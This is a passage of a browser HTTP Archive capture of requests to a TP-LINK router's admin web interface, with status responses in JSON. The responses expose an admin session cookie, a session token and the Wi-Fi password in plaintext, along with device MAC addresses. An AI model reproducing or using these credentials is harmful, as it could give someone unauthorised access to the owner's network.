\"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 265,\r\n \"dns\": 251,\r\n \"connect\": 517,\r\n \"send\": 0,\r\n \"wait\": 748,\r\n \"receive\": 8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:09.646+03:00\",\r\n \"time\": 932,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4755,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4755\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 266,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 637,\r\n \"receive\": 29\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:09.653+03:00\",\r\n \"time\": 1840,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 260,\r\n \"dns\": 251,\r\n \"connect\": 528,\r\n \"send\": 0,\r\n \"wait\": 796,\r\n \"receive\": 5\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:19.646+03:00\",\r\n \"time\": 979,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.07,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wa